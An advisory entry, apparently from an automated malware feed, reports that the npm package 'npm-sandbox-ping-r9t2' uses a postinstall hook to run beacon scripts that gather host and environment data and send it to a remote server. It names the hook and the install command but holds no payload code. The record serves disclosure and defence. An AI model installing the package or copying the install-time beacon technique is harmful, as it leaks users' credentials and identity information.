MAL-2026-5986

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (335649d395a44d7de1bc6343dbce1f0459414ef92ab149413a86b47e28f3c7c3) package.json declares a postinstall hook ("postinstall": "node run.js") that auto-executes on install. The package ships beacon scripts (beacon14.js, beacon_linux.js) that import child_process and http/os, run shell commands such as whoami, read process.env, process.platform, os.hostname(), os.platform(), and transmit the collected host/identity data via http.request GET/POST to a remote endpoint. The data flow (system enumeration -> outbound HTTP) and the install-time auto-execution together constitute a credential/host-info exfiltration beacon. Installer harm: any machine that runs `npm install npm-sandbox-ping-r9t2` will silently execute these beacons and leak local identity/environment information to a remote endpoint.